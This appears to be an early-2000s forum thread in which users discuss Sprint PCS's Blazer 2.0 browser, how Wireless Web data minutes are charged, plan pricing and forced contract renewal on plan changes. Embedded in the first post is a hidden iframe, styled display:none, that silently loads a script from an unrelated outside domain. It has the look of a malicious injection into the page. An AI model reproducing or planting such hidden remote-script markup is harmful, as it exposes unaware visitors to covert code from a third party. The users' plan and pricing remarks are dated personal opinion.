In case you guys missed the discussion earlier, the new version of Blazer (2.0) is now available at Sprint. Just log on and download it. What's more exciting is that it works! No fatal error messages!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I d/l Blazer2and it seems to work fine.
Am I correct in that if I access sprintpcs site for email, then there is an additional charge for each minute (not against my monthly minutes), but there is no charge for access via Blazer?

Free SPRINT minutes?

Marctronixx said: once you make a data call on your phone, you will be using your web minutes.. no add'tl charge for accessing sprints site.

Can someone tell me where it says that the minutes I spend browsing at the SprintPCS site are not counted against me?

I can't find the info on-line.

Thanks,
Gary

But the free trial is for any wireless web site. At least it has been with my previous phones.

The previous post said it's free at "sprints site" and the other message leans towards some confusion in that same direction. Free at Sprint but not at other sites (or did they mean other kinds of data calls?).

Ok guys let me clear this up if I can. Wireless web is different that dialing an ISP with your home telephone line. This is because the signal on a PCS phone is different than a signal conected to a wired phone line (it can loose transmission data, etc.) So data transmission works differently. Thats why it wouldn't work to dial your ISP from your PCS phone and go on the internet.

So Sprint offers Wireless web which, if you sign up now, is free for 3 months and $5 a month after that. Wireless web lets you look at any site on the internet, or do any other task that uses the internet (checking email, connecting to a telnte server, etc.). You also get 50 wireless web messages. When you have the wireless web service, your time on the internet takes away from your minutes just like a voice call would.

Hope this clears some things up!

I signed up with a Sprint business account manager. I got 1200 anytime minutes with free LD, Sprint wireless web and voice command for $80/mo plus I got the phone for $300-1 year contract. If you don't have the Sprint Wireless web, they charge you something like .39/minute for data calls. If you have the wireless web then your data calls come out of your plans minutes (voice minutes are the same as data minutes). So must people get the Sprint wireless web for the 6035 or I300. Also having the wireless web gives you a Internet wireless portal that you can choose to use or not to use.

Verizon is different. They also charge you for their version of the Sprint Wireless Web. Same idea, wireless portal. However unlike Sprint, data and voice minutes are the same even if you do not purchase the Verizon web option.

I just happen to get it thrown in for "free" from my Sprint sales guy.

So in conclusion: Wireless web minutes are never free. Just the service charge is waived whenever you sign up (or change plans).

FYI: Occasionally it used to be worth it to change SprintPCS plans, it USED to be six months free Wireless Web when you changed plans (and then it was $10 a month for Wireless Web) a $60 value.

If you changed now you'd get three months free and then only pay $5 a month for WW, seems like it might be worth changing.
But last Friday, SPrintPCS changed their pricing stucture and most of their plans now don't start evenings until 9 PM . So be careful if you switch you might save a few bucks here and there but all those calls you made between 8:00pm and 8:59pm will now use up your anytime (day) minutes sooner. For several plans they did increase the number of anytime minutes (about 50 min a month).

yes... i meant to say when you make a data call you will be using your package minutes... no extra charges apply.

yes they have changed the time on these "holiday" promotions to 9 p.m... i went ahead and got 10,000 minutes... 2k for day and 8k for night! for the same price i would have paid for 4,000 minutes.

Changing Plans

When I had service with AT&T, a great
convenience was the ability to switch
plans mid-month and have that change
go into effect immediately. As we all
know, with Sprint the change is made
at the beginning of your next cycle.
What troubles me most however is
Sprint initiating a new one year
contract each time a plan is changed.
Has anyone one else had to deal with
this or am I being stiffed. It seems a
bit unheard of.

Plans have always changed for me immediately. I used to love that feature. They've always just prorated the two plans for me.

The one year contract is a new deal, though, and a pretty crappy one if you ask me. It used to be that there were no contracts. Then there was the option for $10 off / month if you went 1-year. Now, if you look at the site, it COSTS you $10 / month if you don't!

Are you stating that you have a 1 year
contract, have changed your plan mid
cycle in the last 6 months, and have
had your plan prorated immediately
without having to renew your contract?

...and also, what are the advantages of Blazer
over the Sprint Web. I always use the web and
something tells me that I'm missing out on
something good. Please clue me in!

Oh, ah, no, that's not what I'm stating, sorry. What I mean is that I changed my plan mid cycle, the change took effect immediately (actually it takes 1-4 hours, but who's counting?) and I did have to renew my contract.

Why are they raping us with this contract
renewal. I must admit that at one time, I
too was a negative critic of Sprint. I
was a sales rep for their PCS line when
they first hit the market, yet at that time
they were cutting edge. Now, with the
I300 and other sleek devices, and their
promise of 3G, I have no problem with a
contract with Sprint. Still, don't strong-
arm me into doing business with you.
Just some thoughts.
